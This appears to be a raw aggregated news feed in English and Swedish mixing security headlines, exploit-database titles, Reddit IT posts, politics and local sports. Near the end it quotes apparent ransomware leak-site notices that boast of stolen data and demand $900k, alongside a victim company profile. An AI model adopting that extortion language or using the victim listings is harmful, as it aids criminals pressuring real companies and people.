The company’s latest quarterly advisory describes high and medium-severity issues in BIG-IP, BIG-IQ, and NGINX. The post F5 Patches Over 50 Vulnerabilities appeared first on SecurityWeek.

Sent out on Wednesday was the latest AMDGPU/AMDKFD driver pull request of new feature code ready for DRM-Next as the staging area ahead of the upcoming Linux 7.2 kernel. This doesn't yet land the HDMI 2.1 enablement work that's finally been taking place but it is preparing for that with the FRL register headers now in place as part of this merge...

Introduced to the Linux kernel last year was Control-flow Enforcement Technology "CET" virtualization for modern AMD and Intel CPUs. This complements CET that has existed in Linux for quite some time but it's new now to the KVM virtualization world, but some yet to be diagnosed problems are causing some hosts to hang when making use of this virtualization security feature...

Dell confirmed that its SupportAssist software is causing blue-screen crashes on some Windows systems following a wave of user reports about random reboots affecting Dell devices since Friday. [...]

Fresh kernel flaw comes with public exploit code and continues ugly run of highly reliable privilege escalation bugs tied to memory and page-cache handling

The United States’ first firing of its Philippines-based Typhon missile launcher last week marked the “worst provocation” in years in the South China Sea and Beijing should ramp up air defence and stealth strike drones in response, according to Chinese military observers. Beijing has opposed the Typhon deployment since the Lockheed Martin system arrived at its Luzon base in the Philippines two years ago, claiming it has destabilised regional security. The ground-based vertical launch system can...

Boktipset • En djupt oroande berättelse om mänsklig kortsynthet Alingsås Tidning

The first exploitation attempts were observed less than four hours after the authentication bypass was publicly disclosed. The post Hackers Targeted PraisonAI Vulnerability Hours After Disclosure appeared first on SecurityWeek.

När presidenterna Trump och Xi möttes var frågan om Taiwan helt avgörande enligt Kina. USA å andra sidan nämner inte ens Taiwan i sin redogörelse kort efter mötet. Nu kan stabiliteten i ännu ett viktigt sund för världshandeln vara hotad.

Pay up, or we'll pay someone to pay you a visit. Cybercrime gangs are increasingly turning to real-world threats - and even hiring local muscle to deliver the message. Read more in my article on the Hot for Security blog.

An anonymous cybersecurity researcher who disclosed three Microsoft Defender vulnerabilities has returned with two more zero-days involving a BitLocker bypass and a privilege escalation impacting Windows Collaborative Translation Framework (CTFMON). The security defects have been codenamed YellowKey and GreenPlasma, respectively, by the researcher, who goes by the online aliases Chaotic Eclipse

**Website**: baytech.dk **Revenue**: $5 Million Baytech A/S is a Danish industrial engineering company that provides crane systems, material handling equipment, and logistics solutions for industria

AI already listening in to call handlers in real time, conducting live database searches

Xi Jinping and Donald Trump struck an optimistic tone at the start of their two-day presidential summit in Beijing, even as the Chinese leader highlighted risks surrounding Taiwan. Pre-summit trade talks “produced generally balanced and positive outcomes”, Xi told the US president at the Great Hall of the People in Beijing on Thursday, according to Xinhua. “This is good news for the people of the two countries and the world.” Trump repeatedly called Xi a “great leader” in opening comments at the...

A stray Falcon 9 rocket part is on course to slam into the moon in August. The expected impact poses no immediate danger, experts say, but warn that it highlights a critical lack of rules for managing debris as lunar activity by the US, China and private companies ramps up. Measuring 13.8 metres (45 feet) long and 3.7 metres wide, the SpaceX Falcon 9 rocket’s upper stage has been drifting through Earth-moon space since it launched a US commercial lander and a Japanese lander in January last...

Lettlands premiärminister Evika Silina avgår från sin post sedan oppositionen hotat med att lägga fram en misstroendeförklaring.

The alleged main administrator of Dream Market Incognito Market, one of the largest dark web marketplaces before its shutdown, has been indicted in the United States on money laundering charges. [...]

So, since the beginning of 2026, the company has been laying people off. More than 40 people have already left, and they are still continuing. From what I’ve heard, I think they are planning to let me go as well. I think it’s because there are only me and my manager left in IT, and maybe they feel that two people are too many for the number of employees who will remain. From what I heard, they asked my manager, “If he leaves, will productivity drop?” and he said no. Lately, he has also been asking me a lot of technical questions, almost like he’s trying to learn everything he will need. Even though he is technically the IT manager, most of the time he is not around, and I’m the one who actually works with the users. Honestly, technically speaking, he’s not that good. Him saying that “productivity will not drop” really made me angry at him, and now I don’t even want to teach him anything anymore. Any advice, guys? submitted by /u/Vegetable-Clock-4488 [link] [comments]

Sandstormar, blixtnedslag och kraftiga skyfall ställer till med kaos och förödelse i norra Indien. Nära 100 människor rapporteras ha dött.

CAD: Cost Anomaly Detection or Create Astounding Debt?

Goldberg Coins & Collectibles Inc. is a family-owned business specializing in numismatic auctions and collectibles, with a legacy dating back to 1930. The company offers expert auction services, personal consultations, and has a strong reputation for achieving record-breaking prices for consignors. Their intended clients include coin collectors and investors looking to sell or acquire high-quality numismatic items. With over 80 years of combined experience, Ira and Larry Goldberg provide a professional and personalized service, ensuring client satisfaction and exceptional results.

Article URL: https://github.com/oven-sh/bun/pull/30412 Comments URL: https://news.ycombinator.com/item?id=48132488 Points: 634 # Comments: 697

US President Donald Trump’s second son Eric, who oversees the family business empire, met the top Chinese leader as he accompanied his father on a state visit to Beijing. Eric and his wife Lara posed for photos with Chinese President Xi Jinping before they attended a state banquet on Thursday evening. The younger Trump and the Chinese leader were also seen chatting during a visit to the Temple of Heaven in the afternoon. The executive vice-president of his father’s businesses, Eric oversees...

ORF var inte inblandade i att klippa bort protestrop mot Israel under Eurovision i klipp som laddades upp på Youtube, det skriver det österrikiska tv-bolaget till SVT. – Vi visar exakt vad som pågår i arenan, säger evenemangschefen Oliver Lingens.

The original researcher claimed that TPM+PIN works. I tend to agree, however the issue is not the same as with TPM-only BitLocker bypass. There are two scenarios we could consider - theft and unauthorized access by the user themselves. TPM-only BitLocker-encrypted PC is vulnerable to thieves being able to read all data with the currently published exploit. It is already bad, but adding PIN is a sufficient protection against such scenarios. However, this vulnerability backdoor opens unrestricted, unauthorized access to the file system for the users themselves. At this point consider that all regular users can read and write to any file, if they want. Files like SAM, the registry, anything that is on the file system (like the passwords for the BIOS you store in C:\IT only readable by SYSTEM and TrustedInstaller). TPM+PIN does not protect against this as the users do know the PIN. ༼ つ ◕_◕ ༽つ SUMMON THE PATCH, MICROSOFT ༼ つ ◕_◕ ༽つ submitted by /u/m1m1n0 [link] [comments]

Linux distros are rolling out patches for a new high-severity kernel privilege escalation vulnerability (known as Fragnasia and tracked as CVE-2026-46300) that allows attackers to run malicious code as root. [...]

Details have emerged about a new variant of the recent Dirty Frag Linux local privilege escalation (LPE) vulnerability that allows local attackers to gain root access, making it the third such bug to be identified in the kernel within a span of two weeks. Codenamed Fragnesia, the security vulnerability is tracked as CVE-2026-46300 (CVSS score: 7.8) and is rooted in the Linux kernel's XFRM

Human IT managers thought they were being nice to the boss, but were assisting a threat actor

A trio of preprint papers suggests the universe may not be perfectly uniform on the largest scales, finding tentative 2-to-4-sigma deviations from a core assumption of standard cosmology known as FLRW geometry. Live Science reports: The work combines observations of distant exploding stars and large-scale galaxy surveys to probe whether the universe truly follows a nearly 100-year-old mathematical framework known as Friedmann-Lemaitre-Robertson-Walker (FLRW) cosmology. The analyses revealed mild-but-intriguing deviations from the predictions of the standard model. "We saw a surprising violation of an FLRW curvature consistency test, hinting at new physics beyond the standard model," study co-author Asta Heinesen, a physicist at the Niels Bohr Institute in Copenhagen and Queen Mary University in London, told Live Science via email, referring to the assumption that the space's curvature is the same everywhere. "This could potentially be due to various effects, but more research is needed to address the cause of the FLRW violation that we see empirically." [...] The analyses revealed small but potentially important departures from the predictions of standard FLRW cosmology. Depending on the dataset and analysis method, the discrepancy reached a statistical significance of about 2 to 4 sigma. In physics, sigma measures how likely a result is to arise purely by chance; a 5-sigma result is typically required before scientists claim a discovery, so the new findings remain tentative. Still, the results suggest that something unexpected may be affecting the geometry or expansion of the universe. "The main finding is that you can directly measure Dyer-Roeder and backreaction effects from available cosmological data, and clearly distinguish these effects from other alterations of the standard cosmological model, such as evolving dark energy and modified gravity theories," Heinesen said. "This was previously not possible in such a direct way, and this is what I think is the breakthrough in our work." "If these indicated deviations from an FLRW geometry are real, it would signify that most of the cosmological solutions considered for solving the cosmological tensions -- evolving or interacting dark energy, new types of matter or energy, modified gravity and related ideas within the FLRW framework -- are ruled out," the researchers wrote. The next step will involve applying the new theoretical framework to larger and more precise datasets. "It is to apply our theoretical results to data to test the standard model and to produce constraints on the Dyer-Roeder and backreaction effects," Heinesen said. Read more of this story at Slashdot.

UK researchers find LLMs are learning to finish jobs faster and improving all the time

Besides serving as a place where Microsoft Outlook places suspected spam, the Outlook Junk folder has one additional function that can be quite helpful when it comes to identifying malicious messages. Any e-mail placed in this folder is stripped of all formatting, and destinations of all links included in the message become visible to the user, as you can see in the following images which show the same e-mail when it is placed in the inbox, and when it is placed in the Junk folder.&#xd;

Det blev ett runt två timmar långt möte i Peking för presidenterna Xi och Trump. På agendan var Taiwan, handel och andra konfliktfrågor i relationerna mellan USA och Kina. – Hanteringen av Taiwan kan sätta hela relationen i allvarlig fara, sade president Xi.

"The conversation is sort of happening in Silicon Valley around one thing, and a totally different conversation is happening among consumers," Campbell Brown said at StrictlyVC.

Cybersecurity researchers have disclosed multiple security vulnerabilities impacting NGINX Plus and NGINX Open, including a critical flaw that remained undetected for 18 years. The vulnerability, discovered by depthfirst, is a heap buffer overflow issue impacting ngx_http_rewrite_module (CVE-2026-42945, CVSS v4 score: 9.2) that could allow an attacker to achieve remote code execution or cause a

The US-China summit is “extremely important” to arrest the downward spiral of relations between the two countries, according to Li Cheng, a leading Chinese academic. But a summit would not be enough to change the overall structure of ties, which had been fraught for years, Li said on Thursday as US President Donald Trump began the first full day of his state visit to Beijing – the first by an American leader since 2017. The two presidents began the day with two hours of talks at the Great Hall...

So yellowkey was released yesterday on Github and not gonna lie, this thing scares me. A full encryption bypass method that basically makes Bitlocker obsolete. My question is: are there any ways of mitigating this without spending too much? submitted by /u/DaveTheAllrighty [link] [comments]

Rebel fighters and Rwandan troops are accused of committing atrocities after capturing the DR Congo city of Uvira in December.

Chinese web giant says accelerator shortage is over as local hardware arrives in volume

Se dokumentären om Jamila och Amina Ouahid. De vill ta plats inom tv och film i Sverige – men möter en verklighet där döva sällan syns framför kameran.

Amazon Web Services (AWS) omformar sin underliggande nätverksinfrastruktur, ett steg som kan komma att omdefiniera hur företag förhåller sig till molnteknik, kostnader och driftseffektivitet. När företag överväger nästa generations arbetsbelastningar, från generativ AI till globalt distribuerade applikationer, utgör AWS:s heltäckande, anpassade nätverksstack en ny utgångspunkt för molnekonomi, flexibilitet och säkerhet. Låt oss ta en närmare titt på vad AWS har meddelat, varför det är viktigt och hur smarta företagstekniker bör planera för att navigera i landskapet av möjligheter. Låt oss börja med AWS:s nya nätverksfilosofi, som fokuserar på att göra nätverksanslutningen nästan osynlig för både användare och administratörer. För AWS måste nätverket vara lika pålitligt som att trycka på en strömbrytare – det fungerar helt enkelt, och ingen märker det om det inte går sönder. För att uppnå detta högt ställda mål har AWS under det senaste decenniet gått ifrån traditionell, proprietär nätverkshårdvara och byggt en enhetlig, anpassad stack som spänner över allt från kisel till mjukvara. Kärnan i denna innovation är beslutet att använda en enda applikationsspecifik integrerad krets (ASIC) för växling – kiselhjärnan i centrum av varje nätverksväxel – i sina aggregerings-, kärn- och gränsnätverk. I stället för den gamla branschpraxisen att blanda och matcha hårdvara från olika leverantörer (var och en med sin egen firmware, buggar och skalningsutmaningar) har AWS nätverksingenjörs- och driftsteam som fokuserar på en enda, konsekvent grund. Detta förenklar inte bara inköp och felsökning utan möjliggör också skalbara, reproducerbara distributioner som överträffar hastigheten hos konventionella företags- eller molnarkitekturer. Alla dessa switchar kör Net OS, ett Linux-baserat operativsystem som AWS har utvecklat för att optimera säkerhet, automatisering och snabb patchning. Om ett fel uppstår kan AWS åtgärda det överallt, omedelbart; man behöver inte vänta på leverantörspatchar och det finns ingen risk att gårdagens firmwareproblem kan eskalera till morgondagens driftstopp. Siffrorna är häpnadsväckande. Den nuvarande AWS-switchen hanterar 51,2 terabit per sekund (Tbps) över 64 portar, var och en med en hastighet på 800 Gbps. Men innovationstakten accelererar: AWS nästa generations switch, som kommer snart, kommer att nå 102,4 Tbps, med portar som körs på 1,6 Tbps. Sammantaget består AWS nätverk av ungefär 2 miljoner enheter, 50 till 60 miljoner optiska länkar och mer än 20 miljoner kilometer fiber – tillräckligt för att cirkulera månen 25 gånger. Komplexiteten i företagen exploderar Varför bör företag bry sig om detta? Nätverk är fortfarande en dold drivkraft för molnkostnader, tillförlitlighet och flexibilitet. Ju mer komplex din applikationsportfölj blir – från AI-drivna kluster till globalt distribuerade databaser – desto mer betalar du för bandbredd, latens, driftstopp och administrativa kostnader. AWS:s anpassade stack innebär att nätverkets tillförlitlighet, hastighet och säkerhet är inbyggda i infrastrukturen. När AWS uppgraderar sin hårdvara och mjukvara får företagen tillgång till dessa förbättringar omedelbart. En höjdpunkt är introduktionen av hollow-core fiber. Genom att ersätta traditionell fiber med glasrör omgivna av luft (eller vakuum) minskar AWS nätverkslatensen med 30 procent, vilket gör datacenterregionerna större, mer flexibla och bättre rustade att möta krav på låg latens – till ett premiumpris för arbetsbelastningar där latens är skillnaden mellan vinst och förlust. AWS högprecisionsnätverk är en annan banbrytande innovation för arbetsbelastningar som distribuerade databaser och finansiella handelsplattformar. Genom att synkronisera klockor med en noggrannhet på mikrosekunder möjliggör AWS globalt konsistenta transaktioner, vilket öppnar upp för nya applikationsarkitekturer för företag som tidigare tvingades betala höga priser för specialiserad hårdvara och mjukvara. Ännu viktigare är den ”osynliga” nätverksstrategin. Eftersom AWS äger både hårdvaran och mjukvaran kan man snabbt åtgärda buggar, fixa sårbarheter och optimera prestandan. För företagsarbetsbelastningar minskar detta risken, förkortar underhållsfönstren och påskyndar införandet av nya tekniker som generativ AI. Den nya Ultra Cluster-nätverkstopologin minskar också antalet växlar mellan servrar, minskar latensen och stöder gigantiska kluster, vilket är avgörande för företag som satsar stort på AI-träning och inferens. Uppnå kostnadsbesparingar och undvik fallgropar Företag som planerar att införa AWS senaste nätverksplattform bör börja förbereda sig redan nu, även om införandet ligger flera månader fram i tiden. Gör först en grundlig analys av nuvarande och framtida nätverksbehov. Om dina arbetsbelastningar blir allt mer distribuerade, realtidsbaserade eller bandbreddskrävande (tänk AI, Internet of Things, databas-sharding eller finansiell handel) är du troligen en utmärkt kandidat för att dra nytta av fördelarna. Kartlägg era befintliga arkitekturer mot högpresterande nätverksregioner med låg latens inom AWS och utvärdera om era molnbaserade eller hybridarbetsbelastningar kan dra nytta av dessa innovationer utan större förändringar av kod eller dataarkitektur. För det andra, ompröva din driftsmodell. Eftersom AWS hanterar så stor del av nätverksstacken måste it-team flytta fokus från djupgående infrastrukturhantering till strategisk arbetsbelastningsplacering, kostnadsoptimering och prestandajustering. Det som en gång var en högt specialiserad kompetens – finjustering av leverantörsspecifik hårdvara och mjukvara – ger vika för en modell som drivs av insyn, automatisering och integration mellan AWS-tjänster. Företag bör investera i utbildning och verktyg som gör det möjligt för deras team att snabbt reagera på nätverksuppgraderingar, lanseringar av nya funktioner och förändringar i datalokalitet, så att de förblir agila och konkurrenskraftiga. Slutligen bör man utvärdera partnerskap, säkerhet och efterlevnadsmodeller. AWS:s anpassade stack erbjuder förbättrad patchning och snabb respons på sårbarheter, men företagen måste se till att deras egna säkerhetskontroller och revisionsspår är upp till uppgiften. Detta inkluderar granskning av incidenthanteringsplaner, efterlevnadscertifieringar och övervakningsfunktioner, särskilt när nätverksstommen blir ”osynlig” och mindre direkt kontrollerad. Var passar AWS plattform in? AWS innovationer är idealiska för företag med högpresterande, distribuerade arbetsbelastningar, för företag som skalar ut på sätt som belastar äldre arkitekturer, eller för dem som vill minimera driftstopp och driftsfriktion. Om hastighet, tillförlitlighet och extremt låg latens är viktiga konkurrensfördelar, kommer AWS anpassade stack nästan säkert att passa. Men inte alla företag eller arbetsbelastningar behöver det allra senaste. Företag med stabila arbetsbelastningar med låg volym, liten geografisk spridning eller begränsat beroende av realtidsdata kan tycka att de höga priserna för den senaste nätverksinfrastrukturen är onödiga. För vissa behåller multicloud- eller hybridimplementeringar ett strategiskt värde av flexibilitets- eller efterlevnadsskäl; för dessa organisationer krävs en noggrann arkitektur för att undvika inlåsning och för att säkerställa att arbetsbelastningarna kan spänna över flera leverantörer eller lokala miljöer. I slutändan handlar AWS nya nätverksplattform inte bara om hastighet eller kapacitet. Den signalerar en förskjutning mot operativ agilitet, säkerhet och kostnadsoptimering för företag som är villiga att anpassa sig – och en varning till dem som halkar efter. Dagarna av att brottas med lappverk av hårdvaruleverantörer och vänta på nätverksuppgraderingar är på väg att försvinna. För att dra nytta av AWS nätverksrevolution måste företag utveckla sina strategier i dag genom att samordna teknik, människor och processer för att få en konkurrensfördel imorgon.

After three weeks of testimony, the Musk v. Altman trial is nearing its end. OpenAI has rested its case, closing arguments are set for Thursday, and jury deliberations are expected to begin afterward. An anonymous reader quotes a report from Business Insider: Joshua Achiam, OpenAI's chief futurist, was probably the most memorable witness of the day. He told jurors about a companywide meeting where Musk answered questions about his planned departure from OpenAI in 2018. Musk told the crowd of 50 or 60 people that he was leaving OpenAI to start his own competing AI. He said he wanted to "build it very fast, because he was very worried that someone else, if they got it, would do the wrong thing with it," Achiam said. Achaim said he challenged Musk on the safety of this approach, which he called "unsafe and reckless." "How did Musk respond," OpenAI's lawyer Randall Jackson asked. "Defensively," Achiam said. "We had a pretty tense exchange, and he snapped and called me a jackass." In an effort to prove Achiam's story, OpenAI's lawyers brought a trophy to court that the futurist said he received after his heated exchange with Musk. On the witness stand, Achiam described the trophy as "a small golden jackass, inscribed with: 'never stop being a jackass for safety.'" He said his then-colleagues, Dario Amodei and David Luan, gave it to him as a thank-you for standing up to the Tesla CEO. Lead OpenAI attorney William Savitt told reporters after the day's session that Wednesday had been the first time he'd touched the statue. The futurist had to do without the visual aid, however. Judge Yvonne Gonzalez Rogers did not accept the trophy as evidence, so it did not appear before the jury. Musk and Altman have presented dueling experts on a question at the core of the trial -- was the nonprofit that runs OpenAI hurt or helped by its $13 billion partnership with Microsoft? Musk's expert testified last week that the partnership was indeed hurt, supporting the Tesla CEO's contention that in partnering with Microsoft, OpenAI betrayed the company's nonprofit origins and mission. But on Thursday, OpenAI's expert, John Coates, used Musk's expert's own pie chart and testimony against him. The partnership has "generated value for the nonprofit that I believe he himself accepted was in the $200 billion range in his own testimony," Coates said, referencing Musk expert Daniel Schizer. "If that's not faring well, I don't know what faring well is." In a scored point for Musk, the jury learned Thursday that Microsoft's own CTO once raised concerns about how OpenAI's early nonprofit donors, including LinkedIn cofounder Reid Hoffman, would react to a partnership. "I wonder if the big OpenAI donors are aware of these plans," Chief Technology Officer Kevin Scott said in a 2018 email he was asked to read aloud to jurors. In it, Scott said he doubted donors would appreciate OpenAI using their seed money to "go build a for-profit thing." Scott was being questioned by an OpenAI lawyer, who may have wanted jurors to quickly hear Scott's explanation: that he only had a "vague awareness" of what was happening at OpenAI at the time. Scott also told the jury he wasn't thinking about Musk when he made the remark. "Primarily, I was thinking about Reid Hoffman. He was the OpenAI donor I knew," Scott said, adding, "I wasn't thinking about anyone besides him." Recap: Sam Altman Testifies That Elon Musk Wanted Control of OpenAI (Day Ten) Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine) Sam Altman Had a Bad Day In Court (Day Eight) Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven) Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six) OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five) Musk Concludes Testimony At OpenAI Trial (Day Four) Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One) Read more of this story at Slashdot.

No summary in RSS payload. Open original transmission for the full article.

No summary in RSS payload. Open original transmission for the full article.

Li Hongzhi, an award-winning former head of GenAI at Microsoft Asia, has joined Tongji University, one of China’s leading universities. Li started his first job at technology giant Microsoft immediately after obtaining his PhD from Columbia University. For more than 10 years, he worked at Microsoft Research – the company’s subsidiary responsible for basic and applied research in computer science, software engineering and hardware design. Li was the head of Microsoft AI Asia’s GenAI Group before...

Chinese President Xi Jinping held closed-door talks with his American counterpart Donald Trump following an elaborate welcome ceremony at the Great Hall of the People in Beijing. Here are some highlights from Thursday. Defining Ties Xi and Trump agreed to build a “constructive, strategically stable relationship”, a new term to define the framework of ties between the two countries. The new strategic position should be led by cooperation and “measured competition with healthy stability”, Xi...

Article URL: https://www.anthropic.com/news/claude-for-small-business Comments URL: https://news.ycombinator.com/item?id=48130950 Points: 520 # Comments: 458

Today, we welcome the 44th government onboarded to Have I Been Pwned’s free gov service: The Bahamas. The National Computer Incident Response Team of The Bahamas, CIRT-BS, now has access to monitor government domains against the data in HIBP. As the national CIRT, CIRT-BS is responsible for coordinating

Oppositionen rycker ifrån i SVT/Verians majmätning. Tidöpartierna tappar 1,5 procentenheter och de rödgröna partierna noterar en ledning med 10,7 procent. Blockskillnaden är den största sedan augusti 2023.

Reducing memory requirements to control costs in a new wave of kit

I Ludvika och Fagersta står kommunerna inför en ödesaffär. De erbjuds att köpa statliga Vattenfalls aktier i energibolaget VB Energi – för 1,4 miljarder. Avstår de riskerar samhällskritisk infrastruktur att hamna i utländska köpares händer. – Den här möjligheten kommer inte igen, säger Åsa-Märta Sjöström (S), kommunalråd i Fagersta.

Sju av totalt 18 politiska vildar i Östergötland är före detta Socialdemokrater. Det visar SVT Nyheter Öst:s genomgång. – Det är alltid ett misslyckande när en politisk företrädare väljer att lämna partiet, men har kvar sina uppdrag , säger Ellen Aguirre.

I veckan har två personer filmat varg i Kalmar län. I början av veckan syntes en varg till i Bergkvara i Torsås kommun – och på onsdagen dök en varg upp i Gamleby i Västerviks kommun. – Det är inte möjligt att det är samma individ, säger Fredrik Ustrup på Länsstyrelsen.

Hannes Lindgren har lagt ut en efterlysning på sociala medier där han söker ledsagare och sällskap till sina många dagar på Liseberg i sommar. Intresset har blivit betydligt större än han väntade sig. – Nu är det runt 40, någonting sånt, säger han.

Even before US President Donald Trump touched down in Beijing on Wednesday, the first act of the China-US summit was playing out in the skies above the Chinese capital. Hundreds of professional photographers and residents lined up across various points near Beijing Capital International Airport to capture one of the most recognisable symbols of the American presidency – Air Force One. Within minutes of its appearance, Chinese social media was flooded with videos and photos of the aircraft’s...

Article URL: https://github.com/DrCatHicks/learning-opportunities Comments URL: https://news.ycombinator.com/item?id=48130679 Points: 232 # Comments: 46

Intim vård för äldre skapade hetsig debatt i fullmäktige Alingsås Tidning

Price ??? Disclosures 0/1

Article URL: https://www.tomshardware.com/tech-industry/cyber-security/microsoft-bitlocker-protected-drives-can-now-be-opened-with-just-some-files-on-a-usb-stick-yellowkey-zero-day-exploit-demonstrates-an-apparent-backdoor Comments URL: https://news.ycombinator.com/item?id=48130519 Points: 251 # Comments: 139

Kinas Xi Jinping har tagit emot USA:s Donald Trump i Peking. Det är första gången på nära ett decennium som de två presidenterna möts i Kina. – Vi borde vara partners och inte rivaler, säger Xi vid välkomnandet.

Kryss mellan Gerdsken och Skepplanda efter svängig match Alingsås Tidning

Article URL: https://blogs.cisco.com/news/our-path-forward Comments URL: https://news.ycombinator.com/item?id=48130123 Points: 270 # Comments: 305

This live article is freely available to our registered users. Please log in or create an account below. Unrivalled Xi-Trump summit analysis: get real-time updates and exclusive boots-on-the-ground reporting from our Beijing and Washington bureaus. Subscribe now with great savings to stay ahead. US President Donald Trump is meeting Chinese President Xi Jinping for a much-anticipated summit that could shape the next stage of rivalry between the world’s two superpowers. It is the first visit to...

Vårgårda vände halvtidsunderläge till seger Alingsås Tidning

Chinese universities have significantly overtaken their American rivals in research output at one of the world’s leading artificial intelligence (AI) conferences, according to an analysis of more than 5,000 accepted papers that went viral on social media. Among the top 50 institutions contributing to the International Conference on Learning Representations (ICLR), held in Rio de Janeiro last month, mainland China accounted for about 44 per cent of the total, with Tsinghua University, Shanghai...

Native:Moderaterna Lerum Alingsås Tidning

Storförlust för IK Frisco hemma mot Toarpsalliansen Alingsås Tidning

US Secretary of State Marco Rubio said Washington hopes to convince Beijing to play a “more active role” in resolving the Iran crisis, a clear sign the issue will come into sharp focus when President Donald Trump holds his closely watched summit with Chinese leader Xi Jinping. Speaking to Fox News aboard Air Force One, Rubio said the Iran war was a “huge source of instability” and “threatens to destabilise Asia more than any other part of the world because it’s heavily reliant on the straits for...

Timur Kristóf of Valve's Linux open-source graphics driver team isn't done driving new improvements to aging AMD GCN 1.0/1.1 era graphics cards on Linux. Beyond enhancing display support for older APUs, transitioning GCN 1.0/1 GPUs from the legacy Radeon driver to modern AMDGPU driver, and a host of other fixes and optimizations for these old GPUs going back to the Radeon HD 7000 series, he has another notable addition that was announced today. These original GCN graphics cards with pending patches to the AMDGPU kernel driver and Mesa user-space can now allow for DRM format modifiers...

The PanVK Vulkan driver and Panfrost Gallium3D driver for Arm Mali graphics hardware is now supporting the latest "v14" hardware GPU hardware with the Arm Mali G1-Pro now being advertised as supported...

Article URL: http://www.scorch2000.com/web/ Comments URL: https://news.ycombinator.com/item?id=48129694 Points: 375 # Comments: 146

The court has ordered a new trial over the June 2021 killings of Paul and Maggie Murdaugh.

After his company asked him to accept a pay cut and demotion following an AI rollout, a fintech worker sued — and won.

As social media fuels a growing passion for persimmon trees, wealthy urbanites in eastern China are paying thousands to ship prime specimens from distant villages.

WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI

Apache HertzBeat 1.8.0 - Remote Code Execution

ePati Antikor NGFW 2.0.1301 - Authentication Bypass

PJPROJECT 2.16 - Heap Bufferoverflow

Palo Alto Networks found and fixed 75 flaws this month, up from its usual five

Despite continuing Israeli attacks and occupation, many people in the south still believe the armed group is the only force capable of defending them.

Apple released iOS 26.5 yesterday with a new Suggested Places feature in the Apple Maps app, which is a precursor to the ads that Apple plans to start showing later this year. There was some confusion over whether ads are live, but as of now, the ‌Apple Maps‌ app still doesn't have ads. Apple did start laying the groundwork for ads in iOS 26.5 and tested a splash screen, but no ads appeared during the beta testing period or after launch. When Apple announced plans to bring ads to the Maps app in March, it said that ads will be implemented in the United States and Canada "this summer." Astronomical summer in the Northern Hemisphere starts on June 21 and ends on September 22. Meteorologically, summer begins on June 1 and lasts through August, so depending on Apple's definition of summer, we'll get ads in Maps sometime between June 1 and September 22. Ads will be displayed in ‌Apple Maps‌ search results and in the new Suggested Places section added in iOS 26.5. Suggested Places shows recommendations based on what's trending nearby and a user's recent searches. There will be ads in the Maps app on iPhone and iPad, and they will be clearly marked with an "Ad" label, similar to how ads appear in App Store search results. Businesses will bid for ad placement, and the highest bidder for a keyword or search term will have its ad shown in search. Apple says that location data and the ads that users see and interact with in the Maps app are not associated with an Apple account, and data is not shared with third parties. There is no opt-out for location-based or personalized ads in Suggested Places.Tags: Apple Ads, Apple MapsThis article, "Ads Aren't in the Apple Maps App Yet, But They're Coming Soon" first appeared on MacRumors.comDiscuss this article in our forums

Welcome to the largest educational data breach in history - affecting nearly 9,000 institutions, every Ivy League university, and 30 million students mid-finals. When Canvas's parent company refused to pay and announced they had deployed "security patches" instead, the hackers were less than impressed. So they came back through the cat flap. Meanwhile, a famous finance expert's face has been showing up on Facebook adverts promising hot stock tips and exclusive WhatsApp investment groups. Spoiler: it isn't him, the tips aren't real, and you're about to be scammed. Plus we chat to Mike Nichols of Elastic, about how the SOC isn't dying, attackers and defenders are both deploying AI agents, and how the real security crisis is no longer human users - it's the bots acting on their behalf. All this and more in episode 467 of the "Smashing Security" podcast with cybersecurity expert and keynote speaker Graham Cluley, and special guest Danny Palmer.

A man accused of stealing hard drives containing unreleased Beyonce music, tour plans, and other materials from a rental car in Atlanta has pleaded guilty and accepted a five-year sentence, including two years in custody. Slashdot Bruce66423 shares a report from The Guardian: Kelvin Evans was by the Atlanta police department in September in connection to a July 2025 car robbery where two suitcases containing Beyonce music and tour plans were stolen from a rental car. [...] According to a July police report, Beyonce choreographer Christopher Grant and dancer Diandre Blue called 911 to report a theft from their rental vehicle, a 2024 Jeep Wagoneer, before Beyonce's Cowboy Carter tour dates in Atlanta. An October indictment stated that Evans entered the car on July 8 "with the intent to commit theft." The stolen hard drives contained "watermarked music, some unreleased music, footage plans for the show and past and future set list," according to a police report. Clothing, designer sunglasses, laptops and AirPods headphones were also stolen, Grant and Blue said. Local law enforcement searched for the location of one of the stolen laptops and the AirPods to try and locate the property. One police officer wrote in the report: "I conducted a suspicious stop in the area, due to the information that was relayed to me. There were several cars in the area also that the AirPods were pinging to in that area also. After further investigation, a silver [redacted], which had traveled into zone 5 was moving at the same time as the tracking on the AirPods." Evans was arrested several weeks after Grant and Blue filed a report, and was publicly named as the suspect in September. He was released on a $20,000 bond a month later. At the time of his arrest, Atlanta police said that the stolen property had not been recovered. It is unclear whether it has since been found. Bruce66423 commented: "Just for stealing a couple of suitcases from a car. Funny how the elite punish those who inconvenience them. Can you imagine an ordinary victim see their offender get that sort of sentence?" Read more of this story at Slashdot.

If a setting fails in the forest and nobody hears it ...

$900k to Solve the Problem 5TB — While TTT Company was preoccupied with designing luxurious interiors and architectural masterpieces, they completely overlooked the design of a secure network. We have spent enough time within their internal infrastructure to conclude that their security is incredibly fragile. We have successfully exfiltrated all of the company's data and now possess 5 TB of the most sensitive information, including complete blueprints and CAD designs for prestigious clients (Toyota showrooms, gyms, luxury resorts, and government projects). We have accessed every employee's personal drive, including IDs, passports, and private medical records. Furthermore, we hold confidential contracts, tax reports (BCTC), internal financial audits, and detailed security schematics for client buildings.

+40G Full Financial Backups (Quickbooks & Reckon)-Email Archives & Staff Personal Folders-Customer/Client Databases (Installers & Integrators nationwide)-Shipment & Order Tracking for major brands like Hikvision & Axis.

West Pharmaceutical Services disclosed that it was the target of a cyberattack that resulted in data exfiltration and system encryption. [...]

Right-clicking could go the way of the 3.5-inch floppy at the Chocolate Factory

A Chinese-American was found guilty on Wednesday of acting as a Chinese agent in a case involving a Chinese police station set up in New York’s Chinatown. The week-long trial of Lu “Harry” Jianwang, 64, was seen as a test of Washington’s ability to counter what prosecutors said were efforts by Beijing to expand its influence and intimidate Chinese communities well beyond its shores. On the three charges Lu faced in the US Eastern District Court of New York, he was found guilty of acting as an...

